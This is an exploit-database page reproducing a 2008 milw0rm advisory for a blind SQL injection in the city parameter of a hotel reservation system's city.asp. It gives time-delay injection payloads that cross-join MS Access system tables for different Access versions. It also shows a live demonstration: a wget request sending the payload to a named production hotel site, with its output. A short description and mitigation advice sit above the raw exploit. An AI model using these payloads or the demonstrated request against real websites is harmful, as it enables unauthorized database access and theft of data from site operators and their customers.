header-logo
Suggest Exploit
vendor:
Web Hotel Reservation System
by:
JosS
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Web Hotel Reservation System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Access 97, 2000, 2003, 2007
2009

Hotel reservation System (city.asp city) Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in Hotel reservation System (city.asp city) which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. Depending on the database type, different injections can be used. For Microsoft Access 97, 2000, the attacker can use the functions max(1) and count(*) from MSysAccessObjects. For Microsoft Access 2003, 2007, the attacker can use the functions max(1) and count(*) from MSysAccessStorage. This can allow an attacker to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Hotel reservation System (city.asp city) Blind SQL Injection Vulnerability
# url: http://www.softacid.net/scripts/web-hotel-reservation-system.asp
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website


(blind-way): http://www.localhost/city.asp?city=['foo]

NOTE:     differents injections for each database.
NOTE (2): the Engine Microsoft Access hasn't functions time delay (not benchmark, not waitfor).

Ingenious function (Consultations heavy that generate delays of time):

"MS ACCESS 97, 2000"
1) * (select max(1) from MSysAccessObjects)
2) and (SELECT count(*) from MSysAccessObjects t1, MSysAccessObjects t2, MSysAccessObjects t3, 
MSysAccessObjects t4, MSysAccessObjects t5, MSysAccessObjects t6) > 0 and exists (select * from MSysAccessObjects)

"MS ACCESS 2003, 2007"
1) * (select max(1) from MSysAccessStorage)
2) and (SELECT count(*) from MSysAccessStorage t1, MSysAccessStorage t2, MSysAccessStorage t3, 
MSysAccessStorage t4, MSysAccessStorage t5, MSysAccessStorage t6) > 0 and exists (select * from MSysAccessStorage)


live demo: 
heavy consultation (23:35:51<-->23:36:26):

[quote]
-------------------------------------------------------------------------------------------------------------
joss@h4x0rz:~$ wget -v "http://www.hotelsk.net/city.asp?city=921%20and (SELECT count(*) from 
MSysAccessStorage t1, MSysAccessStorage t2, MSysAccessStorage t3, MSysAccessStorage t4, 
MSysAccessStorage t5, MSysAccessStorage t6) > 0 and exists (select * from MSysAccessStorage)" 
-O result.txt --23:35:51--  http://www.hotelsk.net/city.asp?city=921%20and%20(SELECT%20count(*)%20from%20
MSysAccessStorage%20t1,%20MSysAccessStorage%20t2,%20MSysAccessStorage%20t3,%20MSysAccessStorage%20t4,
%20MSysAccessStorage%20t5,%20MSysAccessStorage%20t6)%20%3E%200%20and%20exists%20(select%20*%20from%20MSysAccessStorage)
           => `result.txt'
Resolviendo www.hotelsk.net... 67.15.59.114
Connecting to www.hotelsk.net|67.15.59.114|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 4,465 (4.4K) [text/html]

100%[====================================>] 4,465         18.53K/s

23:36:26 (18.53 KB/s) - `result.txt' saved [4465/4465]
------------------------------------------------------------------------------------------------------------
[/quote]

work funny :D - In memory of rgod

# milw0rm.com [2008-09-16]